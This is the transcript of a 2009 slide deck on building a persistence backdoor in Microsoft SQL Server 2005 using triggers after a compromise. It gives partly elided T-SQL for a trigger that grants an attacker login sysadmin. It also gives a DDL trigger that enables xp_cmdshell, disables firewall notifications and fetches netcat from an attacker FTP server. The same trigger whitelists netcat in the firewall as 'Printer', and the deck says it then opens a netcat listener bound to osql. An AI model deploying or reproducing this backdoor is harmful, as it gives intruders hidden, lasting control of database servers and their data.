MSSql server 2005 backdoor
description
Transcript of MSSql server 2005 backdoor
![Page 1: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/1.jpg)
Duong Ngo October 14, 2009
![Page 2: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/2.jpg)
POST-EXPLOITATION
Got access to a MSSQL box? (SQL injection, brute force…)
Privileges: sa / dbo / normal user
Got all data
Now what’s next??
![Page 3: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/3.jpg)
Backdoors
Provide easier access to the compromised box in the future
Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell,
CGITelnet..)
So how’s about Database Backdoor?? YES!
![Page 4: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/4.jpg)
SQL Server 2005 Backdoor
We’ll create a backdoor based on SQLServer Trigger.
What’s Trigger?
![Page 5: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/5.jpg)
Database Trigger
Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)
Trigger gets executed under the security context of who caused trigger to fire!
![Page 6: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/6.jpg)
EXAMPLE – Create trigger
Context: Normal User with Create Trigger permission:
CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE
AS
EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘
![Page 7: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/7.jpg)
EXAMPLE – Trigger got fired Context: sa (server admin) sa> DELETE * FROM tblCustomers
RESULT??User: “Hacker” now become sysadmin
![Page 8: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/8.jpg)
What can we do with that? Privilege escalation: normal user ->
higher role
Database backdoor
![Page 9: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/9.jpg)
SQLServer Backdoor features: - Execute subsequent commands if current user is 'sa‘
- Enable xp_cmdshell - Create new login 'backdoor' and add it to sysadmin
server role. - Disable firewall notification mode - Add ftp to allowed programs list - Get netcat from attacker ftp server - Create a directory 'Backdoor_activated' in attacker
ftp server to let attacker knows whenever the backdoor has been started.
- Open netcat in listen mode attached with sql command line client Osql.
![Page 10: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/10.jpg)
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
ASBEGINDECLARE @cur_user varchar(200)……CREATE LOGIN [backdoor] WITH PASSWORD =
'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame =
N'Backdoor', @rolename =N'sysadmin'--disable firewall notification modeExec master..xp_cmdshell 'netsh firewall set notifications
disable‘…..
![Page 11: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/11.jpg)
Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION
….….
![Page 12: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/12.jpg)
Our Backdoor’s Code (cont)-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfileEXEC master..xp_cmdshell @cmd, NO_OUTPUT……
-- After get netcat, add netcat to firewall’s allowedprogram list
SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
![Page 13: MSSql server 2005 backdoor](https://reader033.fdocuments.in/reader033/viewer/2022050805/56814706550346895db43fbc/html5/thumbnails/13.jpg)
Thank You for listening!!